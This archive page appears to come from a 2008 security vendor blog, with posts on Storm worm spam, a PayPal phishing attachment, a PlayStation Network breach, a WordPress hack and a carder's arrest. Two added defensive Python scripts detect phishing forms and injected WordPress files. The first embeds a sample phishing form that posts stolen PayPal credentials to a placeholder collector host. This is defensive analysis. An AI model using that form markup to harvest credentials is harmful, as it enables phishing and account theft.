Archive for March, 2008
March 31st, 2008 by Robert McArdle (Threats Analyst)
We’ve spotted a new variant of a well-known threat cashing in on April Fool’s Day in the last few hours. Anyone want to hazard a guess as to what it is?
Wasn’t that hard of a question, I guess. The Storm gang is at it again.

Too lazy to actually create their own image to represent the holiday, the group simply Googled “April Fools” and used the first image that showed up. So far, emails are being spammed out with the subject line “April Fool’s Day”, and the executables on the site are called foolsday.exe or funny.exe. However, if the gang’s past behavior is any indication, these file names will change several times over the next 48 hours to similarly themed names. They’ve already added Kickme.exe in the time it took me to type this.
Needless to say, Trend Micro customers are already being protected using our Web Threat Protection technology — blocking access to the sites themselves, preventing the user from any exposure to the threat. We are also adding detection proactively for the binary files themselves.
Overall, I doubt that this incident will be remembered in the same way as other classics such as the value of pi being changed to 3.0 and the hotheaded naked ice borer, but this is definitely one prank you do not want to fall for.
Robert McArdle, Senior AntiVirus Specialist
March 31st, 2008 by Macky Cruz (Technical Communications)
For the longest time now, phishers have been spamming targets with email messages that contain links to phishing sites. Last Friday, our Content Security team was able to net a phishing attempt that deviated from this “standard operating procedure.”
Here are a few examples of email messages used by this phishing attack:




Below is a screenshot of the attached HTM file’s contents:

It is a PayPal phish; the text tries to ease user apprehension with phrases such as “fortifying online security,” “safe Web browsers,” and “extra layer of security.” It then entices the user to enter his/her username and password to “learn more about these protection methods.”
Unfortunately, the information keyed in is not used to log on to PayPal or any security-related site; the form instead sends it to an unrelated URL via an HTTP POST. Needless to say, this information can then be used by remote malicious users for their own ends.
This specific strain of spam mail is already detected using AS Pattern 5816. Be sure to update scan engines to ensure the fullest protection from today’s threats. Also, avoid opening attachments sent by unknown senders.
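The attached HTM file works as described above: reassuring text, then a login form whose action POSTs the credentials to a host that has nothing to do with PayPal. As an added example (not code from the original post), the following parser inspects an HTML attachment and flags any form that collects a password but submits it outside the expected brand domain; the sample HTM and the collector host name are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample in the shape of the attached HTM described above:
# reassuring security text, then a form that POSTs off-brand.
SAMPLE_HTM = """
<html><body>
<p>PayPal is fortifying online security with an extra layer of security.</p>
<form method="POST" action="http://collector.example.invalid/drop.php">
  Email: <input type="text" name="login_email">
  Password: <input type="password" name="login_password">
  <input type="submit" value="Learn more about these protection methods">
</form>
</body></html>
"""

class FormCollector(HTMLParser):
    """Record every <form> and whether it contains a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "GET").upper(),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def suspicious_forms(html, expected_hosts):
    """Return forms that collect a password but submit it to a host
    outside expected_hosts (the brand the message claims to be from)."""
    p = FormCollector()
    p.feed(html)
    hits = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname or ""
        on_brand = any(host == h or host.endswith("." + h) for h in expected_hosts)
        if f["has_password"] and not on_brand:
            hits.append({"action": f["action"], "method": f["method"], "host": host})
    return hits

if __name__ == "__main__":
    for hit in suspicious_forms(SAMPLE_HTM, {"paypal.com"}):
        print("credential form posts off-brand:", hit)
```

A relative or empty action (no hostname) is also reported, since a same-origin submit from a file opened locally is not the brand's site either.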
March 31st, 2008 by Roderick Ordoñez (Technical Communications)
Sony says that unauthorized access through the PLAYSTATION®Store, a content download service of the PLAYSTATION®Network, may have occurred. This obviously compromises the millions of accounts subscribed to the network. The full transcript is given here.
However, Sony reassures its customers that only a small percentage of users are affected, and that since PLAYSTATION Network accounts do not display entire credit card numbers, any unauthorized access to a PLAYSTATION Network account is very unlikely to compromise anyone’s credit information.
If you are a Playstation gamer subscribed to this service, it may be time to check your login credentials. “If you can successfully sign in with your pre-set password, your account is not affected by this incident…,” so goes Sony’s statement.
With malware authors also targeting online gaming, where virtual commodities may fetch higher values than their tangible counterparts, this news may come as no surprise. For gamers, online identity is worth its weight in gold, and it would be devastating to see one’s account hacked, and all hard-earned loot stolen, effectively laying all those hours of hard work to waste.
As with any online account, Trend Micro advises caution and compliance with industry best practices. Use strong passwords, change them frequently, and never share them with anyone else. In this regard, a password change is almost mandatory. Nobody wants a real-world “game over.”
March 31st, 2008 by Jovi Umawing (Technical Communications)
Scores of reports flooded the Internet about WordPress 2.3.3 blogs being hacked and exploited by an automated JavaScript (JS) that led users to links to various sites, which also contain the script.
WordPress users and visitors reported having encountered a phishing attempt (a wily one, too) wherein users were prompted to register with the blog before they could leave a comment. Note, though, that most of these sites do not require any registration. Sites with open registration in their WordPress blogs were very much vulnerable, as these are purported to be the very target of this exploit.
Once the vulnerability has been exploited, the script creates a folder named 1 in the user’s wp-content folder. It then populates the created folder with a list of spammy Web page links, mostly related to adult and gambling sites. The linked pages were found to contain the JS script as well.
In this blog post, the author analyzed the g.js script file, which was common to all affected pages. The body of the said .JS code contained the following strings:

Figure 1
Upon closer inspection, one can easily make out the Web site address http://www.preservesitecolorado.org. As of this writing, the site looked bare (see Figure 2), unlike the one described in the blog where the site showed a brief overview about the company/organization and contact information. PreserveSiteColorado.Org was purported to be hosted in China (1)(2)(3)(4)(5).

Figure 2
Hackers also flooded affected pages with links pointing to other infected sites in the comments section of the blog, consequently defacing the page itself. Below is a screenshot sample of the said defacement:

Figure 3
I attempted to search for affected pages myself with Google using the search string inurl:wp-content/1/ (see Figure 4). To date, 21,800 pages are purportedly affected by the exploit. Using the search string allinurl:wp-content/1 (see Figure 5) returns 22,500 pages…and possibly rising. Note also that Google does not flag these pages as something that could potentially harm a system. Even so, not clicking on any of them is still the wise course of action.
![Google Index Results for [inurl:wp-content/1/]](http://www.trendmicro.com/vinfo/images/blog/blog_wordpress1.gif)
Figure 4
![Google Index Results for [allinurl:wp-content/1]](http://www.trendmicro.com/vinfo/images/blog/blog_wordpress2.gif)
Figure 5
As of this writing, a fix for this vulnerability has yet to be issued by WordPress. (You may, however, find this and this useful.) As a workaround, users may want to close their registration feature. Also, be wary of third-party plug-ins you install in your blog sites.
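The two on-disk indicators described above (an injected wp-content/1 folder, and pages under the blog root that pull a script such as g.js from an outside host) can be checked by a blog owner directly. As an added example (not code from the original post or from WordPress), the script below builds a constructed sample blog root, then walks it and reports both indicators; the host names are placeholders.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Absolute http(s) URLs inside HTML/PHP/JS source, e.g. <script src="...">.
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)

def scan_wordpress_root(root, own_hosts):
    """Report the indicators described above: a wp-content/1 directory, and
    HTML/PHP/JS files under root that reference a host other than the blog's
    own (own_hosts). Returns {"spam_dir": bool, "external_refs": [(path, host)]}."""
    findings = {"spam_dir": False, "external_refs": []}
    findings["spam_dir"] = os.path.isdir(os.path.join(root, "wp-content", "1"))
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".html", ".htm", ".php", ".js")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for url in URL_RE.findall(fh.read()):
                    host = urlparse(url).hostname or ""
                    if host and host not in own_hosts:
                        findings["external_refs"].append(
                            (os.path.relpath(path, root), host))
    return findings

def build_sample_site():
    """Constructed sample: a blog root with the injected folder and one spam
    page that loads g.js from an outside host (placeholder name)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "wp-content", "1"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<script src="http://blog.example.test/wp-includes/js/jquery.js"></script>')
    with open(os.path.join(root, "wp-content", "1", "casino.html"), "w") as fh:
        fh.write('<script src="http://spamhost.example.invalid/g.js"></script>')
    return root

if __name__ == "__main__":
    print(scan_wordpress_root(build_sample_site(), {"blog.example.test"}))
```

On a real install the external_refs list will include legitimate references (wordpress.org links, CDN hosts), so add those to own_hosts and treat the wp-content/1 directory as the decisive indicator.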
March 31st, 2008 by Arman Capili (Technical Communications)

The Washington Post ran a story on a detained Ukrainian politico by the name of Dmitry Ivanovich Golubov. The 24-year-old Golubov, who ran for a public post under the Internet Party of Ukraine, was charged with credit and debit card information theft that has resulted in millions of dollars in losses for several financial institutions over several years.
Golubov was quick to deny his involvement in any cybercrime activities and maintained that he was framed by the FBI. For their part, U.S. Federal investigators claim that Golubov ranks among the big guns of online fraud forum Carderplanet.com. Several individuals have also come forward and confirmed Golubov’s online criminal activities, including his alleged partner-in-crime Roman Vega, a.k.a. BOA.
But if Golubov is to be believed, he is allegedly a victim of identity theft. An online posting of his passport came with a note that says:
“I Dmitry Golubov, leading hacker, I hack banks, but I have nothing to fear because the police with me at the same time, and in order for you to believe me that I am not afraid I show you my passport, as well as my home address and home phone.”
He attests that someone must have gotten hold of his passport and scanned it, arguing that it is ridiculous for a cybercriminal to actually announce online that he is one. A raid on his home by federal authorities that led to his arrest failed to turn up material evidence of his involvement in cybercrime. However, investigators argue that he had sufficient time to destroy all pertinent and incriminating data on his computer hard drive. Golubov’s apartment uses a steel door as an entrance, and agents had to cut a hole in the adjacent wall to get in, giving him the much-needed extra time.
Investigators also found a portable electromagnetic pulse generator, known as Raskat in Russian. They believe Golubov used it to remotely destroy all data on his hard drive before or even during the raid. Golubov says otherwise, and holds one of the agents responsible, claiming the agent mistook the Raskat for a remote car key. The agent had pressed it over and over to try to locate Golubov’s car but, instead, erased his computer hard drive in the process.
Golubov has since been out on bail after spending six months in a Kiev prison. This cybercrime-slash-political drama is clearly far from being a closed book, as both parties are adamant in pursuing their cases. Whether Golubov’s criminal activities have a grain of truth to them or not, this just goes to show how cybercrime is turning more professional and organized nowadays—like something straight out of a Mario Puzo novel.